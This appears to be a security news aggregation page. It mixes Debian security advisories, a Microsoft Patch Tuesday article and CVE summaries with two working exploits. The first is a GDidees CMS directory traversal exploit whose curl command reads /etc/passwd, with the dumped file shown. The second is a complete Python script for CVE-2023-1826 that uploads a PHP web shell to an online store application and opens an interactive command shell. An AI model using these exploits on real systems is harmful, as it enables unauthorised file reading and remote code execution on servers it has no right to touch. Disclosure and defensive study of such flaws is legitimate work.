GDidees CMS version 3.9.1 suffers from file disclosure and directory traversal vulnerabilities.

    # Exploit Title: GDidees CMS - 'imgdownload.php' Local File Disclosure# Date : 03/27/2023# Exploit Author : Hadi Mene# Vendor Homepage : https://www.gdidees.eu/# Software Link : https://www.gdidees.eu/cms-1-0.html# Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179### Summary:GDidees CMS v3.9.1 and lower versions was discovered to contain an local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.### Description :Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.Furthermore, there is no admin session check in this code as it should since only the admin user should normallybe able to download QR code.Vulnerable Code :3. if (isset($_GET["filename"])) {4.        $filename=$_GET["filename"];    .....          .....27. @readfile($filename) OR die();### POC :URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwdExploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinntp:x:104:110::/nonexistent:/usr/sbin/nologinmessagebus:x:105:111::/nonexistent:/usr/sbin/nologinuuidd:x:106:112::/run/uuidd:/usr/sbin/nologinpulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologinlightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/falsehadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinvboxadd:x:998:1::/var/run/vboxadd:/bin/falseopenldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/falsesshd:x:110:65534::/run/sshd:/usr/sbin/nologinmysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false### References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179https://nvd.nist.gov/vuln/detail/CVE-2023-27179https://www.exploit-db.com/papers/12883

GDidees CMS 3.9.1 Local File Disclosure / Directory Traversal

LilyPond before 2.24 allows attackers to bypass the -dsafe protection mechanism via output-def-lookup or output-def-scope, as demonstrated by dangerous Scheme code in a .ly file that causes arbitrary code execution during conversion to a different file format. NOTE: in 2.24 and later versions, safe mode is removed, and the product no longer tries to block code execution when external files are used.

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 21 Aug 2021 06:22:22 -0600
Source: lilypond
Architecture: source
Version: 2.22.1-1
Distribution: unstable
Urgency: medium
Maintainer: Anthony Fok <foka@debian.org>
Changed-By: Anthony Fok <foka@debian.org>
Changes:
 lilypond (2.22.1-1) unstable; urgency=medium
 .
   \* New upstream version 2.22.1
   \* Bump Standards-Version to 4.6.0 (no change)
   \* Mark lilypond-{doc-pdf,fonts} "Multi-Arch: foreign"
   \* Drop previously backported upstream patches
   \* Mark Lilypond as insecure for externally fetched data files
     in the new README.Debian.security file kindly provided by
     fellow Debian Developer and security expert Moritz Mühlenhoff
Checksums-Sha1:
 7f5f22c1bd9b04f7a3e14ba92f1ffb7fdde0a575 4500 lilypond\_2.22.1-1.dsc
 13b37383e69d96123630fc7519af4cd8b0feadb0 2510038 lilypond\_2.22.1.orig-guile18.tar.gz
 a79c28f1f9956c756df357ef4ab7051131881cf2 18033161 lilypond\_2.22.1.orig.tar.gz
 6702433bc81923f4100613905bc07a85d8f17d88 80540 lilypond\_2.22.1-1.debian.tar.xz
 7a14c6250e647a2b5267b50e7682515d4ff234ee 22633 lilypond\_2.22.1-1\_amd64.buildinfo
Checksums-Sha256:
 4a1be7cbda2b1190456f0eb1eff3f17d536a4eb6e855dc02031a8627ed8fa4f8 4500 lilypond\_2.22.1-1.dsc
 55ff45dd426c58ef7a5530b4e701c2a6a1e54043c2b69c64206fc105ddd247db 2510038 lilypond\_2.22.1.orig-guile18.tar.gz
 72ac2d54c310c3141c0b782d4e0bef9002d5519cf46632759b1f03ef6969cc30 18033161 lilypond\_2.22.1.orig.tar.gz
 681159939704995506ad31d0898536364faa767c815558809d7e37e94cabf003 80540 lilypond\_2.22.1-1.debian.tar.xz
 b9d7b226188769c0c5acaed1358e58c80eb3a9e52f539d99077f07ee08b72bd7 22633 lilypond\_2.22.1-1\_amd64.buildinfo
Files:
 6e1c5a49d2f78da2a212a3e9b6aa4770 4500 tex optional lilypond\_2.22.1-1.dsc
 2863f46023dd38e33ac37978302c078f 2510038 tex optional lilypond\_2.22.1.orig-guile18.tar.gz
 07321f2d9dc45d2f14d5057609184aae 18033161 tex optional lilypond\_2.22.1.orig.tar.gz
 c4bf1e7f7d7678babd654e5ab7ce38fe 80540 tex optional lilypond\_2.22.1-1.debian.tar.xz
 4816ce4ba492da1a0b5fccead28a793f 22633 tex optional lilypond\_2.22.1-1\_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQJEBAEBCAAuFiEEFCQhsZrUqVmW+VBy6iUAtBLFms8FAmEhOnIQHGZva2FAZGVi
aWFuLm9yZwAKCRDqJQC0EsWaz6b4EACs5L0e594aTv0H0g+tlnVdxJf0H6UUN58L
08zQK4w/ySdvFsPxi7yulTosxVASZNhMM6KwDN24j/gqF+627g1QFLVTE852Zs8W
G9dxKXaAU+yppj5+vTFmJbT/+zFM3+LpCf5gsKj3q6uOK+8WBeX4hEKfIlnr5oJc
VmmPNOnbmSFzJ+N5RgcqSyydeZVfl5fG3z9r42MTWjDp6XkILmXSJM5gp9Dw0Ri1
3oWHFH5CWjJRLKk2o2HMBN2C08wSsJ1fEBYPXbjEurMAcZTaF2Zrqo7A/wO8Op2+
6od4R/2yaZkiwsDABH1jXSCD1pPLO2ts003TKlXMNReSD7NfqtMsj47XddERgznf
2Nzohvcgdcjhah9WeneGEbqn72oZxkvyWT7OIjBpwxMxXKSJWLgFWXwNredyKtNS
gpaUqW69W49awRSraKY3vXvSSaBgXam4+/xwTp+VevmRJEtNJffBsTJdJVx0nF+Q
j+suEpPzAmdG7v6KqdEkoNMRnCNQQCnZ/e4Ar82iDbiCztMfOaohl8CGQVXC3Pxb
kxLfYKwv0HtHoBrQA5hHVB0y03YhzMzepTDi9vSs+i9uaBTE7SlD/Sw/BPt+CTpU
iwqEEcZ79n/3pcefRZaBHx9XAnx/Mfg5+4FxyDZ0cxRtWvY3znLlHU7KfcCkkY0r
2emmKId2LA==
=h3FA
-----END PGP SIGNATURE-----

CVE-2020-17354: Debian Package Tracker

Debian Linux Security Advisory 5388-1 - It was reported that HAProxy, a fast and reliable load balancing reverse proxy, does not properly initialize connection buffers when encoding the FCGI_BEGIN_REQUEST record. A remote attacker can take advantage of this flaw to cause an information leak.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5388-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 13, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : haproxyCVE ID         : CVE-2023-0836It was reported that HAProxy, a fast and reliable load balancing reverseproxy, does not properly initialize connection buffers when encoding theFCGI_BEGIN_REQUEST record. A remote attacker can take advantage of thisflaw to cause an information leak.For the stable distribution (bullseye), this problem has been fixed inversion 2.2.9-2+deb11u5.We recommend that you upgrade your haproxy packages.For the detailed security status of haproxy please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/haproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQ4YxlfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RA+g/8C9B17OgAEYmOivNLX/0SmHC0WQft66LH5a3lrr+xgncSO6h7REzVlgMXIffI+RnTxTuHH0sMb8S1rYsAfaHeAHGzXOEKiooPVwMix3TMTR6mocv5D1V4smTiI8JWZSDIzPLKn1EYKQDXxg8wz6nEVsc5njF8SAcWZ1fDDLgbbVtUEY9SL2dkGLF+QlsGWnsseN6AzNfVm7vYIdTzSFbc1Hd3mnlL+uIolhKkGLtQ+iMTLxWjxu1n4MqIYh3VR/f2BUVez9JP3GZ/BOEZU/M3b91QYjmY2OghAlNBBXlL/jMmbZAAAfFukIK1JIb23iLac/bjv6e8yixwLX0q+t0j4ZTpxmln+iiIPLSZ/1IBYXOvf6nrP/cIueGqwlMFdD6qRm7s8cIsx4Gw8bb+ge9zUCOdkX0uPzLDRWul3e+69fdmWazcmDXIFOrgBcp5cp4i33r0+T338rimyN4Q6CyqYQ756gf5mK8kq/vVLI4qyLYmVjZj2eAUI6EPWptxP0UKUarFtpYsc2XRRFb66bxaRTf1yuPvR3aRJKnBW4+KnuiTho1J5wa/HaK551NWwbgmICsbGsfI5/S0cHpYcvdSRG5SAZavFGUT/dIlsOD4OdjevHGnN021AYP1+EqLuX8Zsq5DQKh3s/yUsl6svTTBOiXZxVer9DLYD+D4yuqkqIc=6SUU-----END PGP SIGNATURE-----

Debian Security Advisory 5388-1

Debian Linux Security Advisory 5387-1 - David Marchard discovered that Open vSwitch, a software-based Ethernet virtual switch, is susceptible to denial of service via malformed IP packets.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5387-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 13, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openvswitchCVE ID         : CVE-2023-1668Debian Bug     : 1034042David Marchard discovered that Open vSwitch, a software-based Ethernetvirtual switch, is suspectible to denial of service via malformed IPpackets.For the stable distribution (bullseye), this problem has been fixed inversion 2.15.0+ds1-2+deb11u4.We recommend that you upgrade your openvswitch packages.For the detailed security status of openvswitch please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openvswitchFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ4TY8ACgkQEMKTtsN8TjZbyRAAsrzNlczYAYlZQtb4iT8qZxHT0VVUwcxoWL7ejlNblGU2WrSFoEdmnqvpE6wy30DL0OhsRd/hmGuwIKfgkuAwQRZzu7+DHIsRfCQvqiQLtS6EUkVz2v/mEARIROSlGvCKg24hGrnN/BecyWem9hR1iK/o5heWm7CmTFF9Lv9cFUWEBwXNR9a8DtP/lM9neqX+VDpB33+N0u1jT4BmR0JyG47GyTzNNPoVrYsaRhpyLOIScXFXiuC5Z4J/pepOKDcIEDTgqfD1l7Z2Yr+L2CUiO0lx6KjSoBw5x4YJYmiLwdA7LdtBKVh0X/zsqBMPpP07Z/wtx6CXmH49KEfuIB4Peai/YBgUeVgq/p5Id7Ztmok+BtURlE0mCQVqh/iUc3G71tFZW7Epa7BxCqb/r0ORElTmZpkyi469qvcJDu0RVXp6UzFnYJYJ1IBYifiErzixy1i8j/7vcBzhOIWr3jcSVhjHLWx4U1a/3wIkDjKoUfgKtAlQddy60hO3YJFtevgqofFDaetCK/HlSqoPjOJ0Jcb8AowTuWtWCUE/Dd3ohfWNrjx6kk10ynsVgzbyMqlLx0P6gyEwGlWdmHmLDZ2F8vEjQ7Bmqc8vFs87RyWdfBTFHKvGXjN2dldzK5g7oSh2M+Ln1LrGTRsSMBJS7eFTqVAl1HLxpXEiNBzliJKBx0g=Gmnz-----END PGP SIGNATURE-----

Debian Security Advisory 5387-1

Debian Linux Security Advisory 5386-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5386-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 12, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-1810 CVE-2023-1811 CVE-2023-1812 CVE-2023-1813                 CVE-2023-1814 CVE-2023-1815 CVE-2023-1816 CVE-2023-1817                 CVE-2023-1818 CVE-2023-1819 CVE-2023-1820 CVE-2023-1821                 CVE-2023-1822 CVE-2023-1823Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 112.0.5615.49-2~deb11u2.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ27IkACgkQEMKTtsN8TjZJnRAAmqQ2oitZ8Xe6N7LFmTq9sADGRMIpupykpRNnPRItA6tVGyDK/yfZnURzD3PTe3uvNx+W8GY+cam3PVjVrPBOXBIga+0NX7krtrs/yIsdKPw0M5EuMiAIl/zwAdoPb8joxdgXMcdDU778iGrx7F0U8/L2cznVSxPP/KZLdEVu35ZoIPxNmH1AmOI91qWoraFdCbLutmtqwTDBwbq+Mk2uzGLlYAhhjEettIArw61unBpi6fMWoCDRSRvIHdXpQWya6WN0MfrUWgtWtQCoqIjyixCOhGVOxYoDrVzJNFDfKZ50eHCwwQxFQPTeK4xk4XBqrh7FnByEAURtZ9dgn3jRdAKZbKsaRQcCYRtGRkbllYD6jYoRTAru+L6b5BKiOL2HZ9Degy53JLNbc92yHpUMnn8oX3AKJM/GKmd053DJkLBP4eVfjh+EyR5cdI4m/pl8zhhQCqt9f7iKoCQPeJe2egMDVg0+Jf1o4oP5117sazBTmsx5yNcsBKHa4jhCUcNxan+7BeRM11edcKkNLDlq/YNC7+ZsqqR6Fps1/rLTgQ0L0LqW2OuEfKfUrfOd9B4G/uWHlYzQepxLy+AcUYnoCekFBHZJ+jtlkwVQ2PBgJ7crSGSWrbfjq0M1NSb9iOlchyINbnvkY3s+YDU0IZcOJqt5lNCrQ0paysYt/+pv994=9/cQ-----END PGP SIGNATURE-----

Debian Security Advisory 5386-1

Debian Linux Security Advisory 5385-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5385-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 12, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-1945 CVE-2023-29533 CVE-2023-29535 CVE-2023-29536  
                 CVE-2023-29539 CVE-2023-29541 CVE-2023-29548 CVE-2023-29550  
Debian Bug     : 982794

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 102.10.0esr-1~deb11u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ28JsACgkQEMKTtsN8  
TjbdRg/8DSoN4DTk+CAuIooGwX0fON/G7DgsrGR+dFwQEBd/PMf7Hy+A9EpjOO7E  
IeXK4XHNOV8qbAx3wQ3E9R6oZT//rvgXjYbiNY717OUkK1D7C5QJEinJsY57J2WX  
TW4Q27RuPVVft9sCsKkq47yQE+XT11Z7FuQ+L8xOSZ8+adfvhKhrlZGtzSd9Olux  
1XNmYgJGXu0IEzm5lqWzu+zvraY/yZbOFMStdu3t/tF+jIA2O6v25E2xczObOepv  
TbynApqS1YAH7qlbvjE31qZ3J0mTWhPLtdo6OBKucpc1KBRuSJYcC5sUoGZ5dFrl  
5+K3YfOlPjTww94mx1Own1WDyNw+g37lEGt5enQ/EkWSVKK4co/pzCvzmc7xxzr9  
64ukerv/C94KjSdmPPr6kr4qjUJThs/XlFTbhbPvRRL0Blk/fIJuG1dALXk2R2Ut  
4La0T9h0tGoEoLDGoI1A/cKl2cLnpGg0LeLxWhMysVcYSFcza/0EfYmGtDbRp5iv  
bB+vlpYjjWaNyx+ZtxDtbPtZ9ZmTOKPjrQ+bJFAEYqykIAlueC3bBwqpMz5SxPqg  
NDxWoGK13S//9Ug3c/GPcxNNiV1jNPxuG9Dy3Kq1/LHKrDtnYOfjXrg7nqelRSHS  
1NVzxuTD/0lV8tlo/806hoZToxINqi+c13/Nm5GnDiMzdg3u/hQ=RuqS  
-----END PGP SIGNATURE-----

Debian Security Advisory 5385-1

TightVNC before v2.8.75 allows attackers to escalate privileges on the host operating system via replacing legitimate files with crafted files when executing a file transfer. This is due to the fact that TightVNC runs in the backend as a high-privileges account.

CVE-2023-27830: TightVNC: What's New in TightVNC

It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild.
Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20

Patch Tuesday / Software Updates

It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild.

Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20 elevation of privilege vulnerabilities. The updates also follow fixes for 26 vulnerabilities in its Edge browser that were released over the past month.

The security flaw that's come under active exploitation is CVE-2023-28252 (CVSS score: 7.8), a privilege escalation bug in the Windows Common Log File System (CLFS) Driver.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said in an advisory, crediting researchers Boris Larin, Genwei Jiang, and Quan Jin for reporting the issue.

CVE-2023-28252 is the fourth privilege escalation flaw in the CLFS component that has come under active abuse in the past year alone after CVE-2022-24521, CVE-2022-37969, and CVE-2023-23376 (CVSS scores: 7.8). At least 32 vulnerabilities have been identified in CLFS since 2018.

According to Russian cybersecurity firm Kaspersky, the vulnerability has been weaponized by a cybercrime group to deploy Nokoyawa ransomware against small and medium-sized businesses in the Middle East, North America, and Asia.

"CVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend the metadata block," Larin said. "The vulnerability gets triggered by the manipulation of the base log file."

In light of ongoing exploitation of the flaw, CISA added the Windows zero-day to its catalog of Known Exploited Vulnerabilities (KEV), ordering Federal Civilian Executive Branch (FCEB) agencies to secure their systems by May 2, 2023.

Also patched are critical remote code execution flaws impacting DHCP Server Service, Layer 2 Tunneling Protocol, Raw Image Extension, Windows Point-to-Point Tunneling Protocol, Windows Pragmatic General Multicast, and Microsoft Message Queuing (MSMQ).

The MSMQ bug, tracked as CVE-2023-21554 (CVSS score: 9.8) and dubbed QueueJumper by Check Point, could lead to unauthorized code execution and take over a server by sending a specially crafted malicious MSMQ packet to an MSMQ server.

"The CVE-2023-21554 vulnerability allows an attacker to potentially execute code remotely and without authorization by reaching the TCP port 1801," Check Point researcher Haifei Li said. "In other words, an attacker could gain control of the process through just one packet to the 1801/tcp port with the exploit, triggering the vulnerability."

Two other flaws discovered in MSMQ, CVE-2023-21769 and CVE-2023-28302 (CVSS scores: 7.5), could be exploited to cause a denial-of-service (DoS) condition such as a service crash and Windows Blue Screen of Death (BSoD).

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

Microsoft has also updated its advisory for CVE-2013-3900, a WinVerifyTrust signature validation vulnerability, to include the following Server Core installation versions -

*   Windows Server 2008 for 32-bit Systems Service Pack 2
*   Windows Server 2008 for x65-based Systems Service Pack 2
*   Windows Server 2008 R2 for x64-based Systems Service 1
*   Windows Server 2012
*   Windows Server 2012 R2
*   Windows Server 2016
*   Windows Server 2019, and
*   Windows Server 2022

The development comes as North Korea-linked threat actors have been observed leveraging the flaw to incorporate encrypted shellcode into legitimate libraries without invalidating the Microsoft-issued signature.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors in the last few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apache Projects
*   Apple
*   Arm
*   Aruba Networks
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Palo Alto Networks
*   Qualcomm
*   Samba
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SonicWall, and
*   Sophos

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Urgent: Microsoft Issues Patches for 97 Flaws, Including Active Ransomware Exploit

Debian Linux Security Advisory 5384-1 - Multiple security vulnerabilities have been discovered in OpenImageIO, a library for reading and writing images. Buffer overflows and out-of-bounds read and write programming errors may lead to a denial of service (application crash) or the execution of arbitrary code if a malformed image file is processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5384-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 10, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openimageio  
CVE ID         : CVE-2022-36354 CVE-2022-41639 CVE-2022-41649 CVE-2022-41684  
                 CVE-2022-41794 CVE-2022-41837 CVE-2022-41838 CVE-2022-41977  
                 CVE-2022-41981 CVE-2022-41988 CVE-2022-41999 CVE-2022-43592  
                 CVE-2022-43593 CVE-2022-43594 CVE-2022-43595 CVE-2022-43596  
                 CVE-2022-43597 CVE-2022-43598 CVE-2022-43599 CVE-2022-43600  
                 CVE-2022-43601 CVE-2022-43602 CVE-2022-43603  
Debian Bug     : 1027143 1027808

Multiple security vulnerabilities have been discovered in OpenImageIO, a  
library for reading and writing images. Buffer overflows and out-of-bounds  
read and write programming errors may lead to a denial of service  
(application crash) or the execution of arbitrary code if a malformed image  
file is processed.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.2.10.1+dfsg-1+deb11u1.

We recommend that you upgrade your openimageio packages.

For the detailed security status of openimageio please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openimageio

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQz0zJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeS2VhAAkzf+mdeKhMeJwj6tgMsq3GwyOvvyUwbCNxH31z43l+EX2SSLROOXfp8H  
N9pkxAPmMfkzNR77FFwKFyHmAMeHwQdO+9w4YQ+Bz2h1xs25snwW9k+4BFGvgZfc  
T4RF5l808YGPJWUoxS3EOfgVYAv7nYc/eSxHvLBSW/4uhsg9fzNeTvWbdGVATNDw  
2Fiy2b5uFeo+uBGveyhzd7sj+spe7cYdFklrSAirKA/QAh0cUlRVfP4uyQysO1iT  
/JK3+vXP+Xis7VmRADNLIfK8xnX5maW6Uru6IuHVHHFMqaSBYPw+1BwIfkz0n60A  
VL+wpVZ+eBdN1QM3srizcHfkB4ZuH/XU+NoNmKiCFPdmguwSPubH6NNEtqr4UHew  
29/PMcneOfGzjSf4tQ6Bk4wjhYEUOTiN3UAJ7Nc7xce92iapzzeHbulAMO9nROch  
KOUVyfauOBLWd5UTKSWGhlb/AWwGCBxhqBnumKRFS8t842xxsrMiufZBWM23q0fr  
smxfDs4uxUhmmQI4nCLUTCjLcFz50/flJNDKSTaRh5Vxu26wklxwFu0kFpiSxc2U  
3K6Ku+nH96ydlSjFLfKGP6L3+SPWzxaojpfxqgkjsA81k6/27arvamlZEb4+LC0D  
EuUmUYu9+6OYBmP6Qa/Awy+6tMX9x6DGtn2VOWpvyAD0xprGi0A=  
=mZTJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5384-1

Online Computer And Laptop Store version 1.0 suffers from a remote shell upload vulnerability.

#!/usr/bin/env python3

# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)  
# Date: 09/04/2023  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip  
# Version: 1.0  
# Tested on: Debian 11.6  
# CVE : CVE-2023-1826

# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.  
import requests  
from argparse import ArgumentParser  
from uuid import uuid4  
from datetime import datetime, timezone

def interactiveShell(fileUrl: str):  
    print("Entering pseudo-shell. Type 'exit' to quit")  
    while True:  
        command = input("\n$ ")  
        if command == "exit":  
            break

        response = requests.get(f"{fileUrl}?cmd={command}")  
        print(response.text)

def uploadFile(url: str, filename: str, content):  
    endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"  
    file = {"img": (filename, content)}

    response = requests.post(endpoint, files=file)  
    return response

def getUploadedFileUrl(url: str, filename: str):  
    timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes  
    epoch = int(timeNow.timestamp()) # Time in milliseconds  
    possibleFilename = f"{epoch}_{filename}"  
    fileUrl = f"{url}/uploads/{possibleFilename}"  
    response = requests.get(fileUrl)  
    if response.status_code == 200:  
        return fileUrl

def exploit(url: str):  
    filename = str(uuid4()) + ".php"  
    content = "<?php system($_GET['cmd'])?>"  
    response = uploadFile(url, filename, content)

    if response.status_code != 200:  
        print(f"[File Upload] Got status code {response.status_code}. Expected 200.")

    uploadedUrl = getUploadedFileUrl(url, filename)  
    if uploadedUrl == None:  
        print("Error. Could not find the uploaded file.")  
        exit(1)  
    print(f"Uploaded file is at {uploadedUrl}")

    try:  
        interactiveShell(uploadedUrl)  
    except KeyboardInterrupt:  
        pass  
    print("\nQuitting.")

def getWebsiteURL(url: str):  
    if not url.startswith("http"):  
        url = "http://" + url  
    if url.endswith("/"):  
        url = url[:-1]  
    return url

def main():  
    parser = ArgumentParser(description="Exploit for CVE-2023-1826")  
    parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")  
    args = parser.parse_args()

    url = getWebsiteURL(args.url)  
    exploit(url)

if __name__ == "__main__":  
    main()

Tag

#debian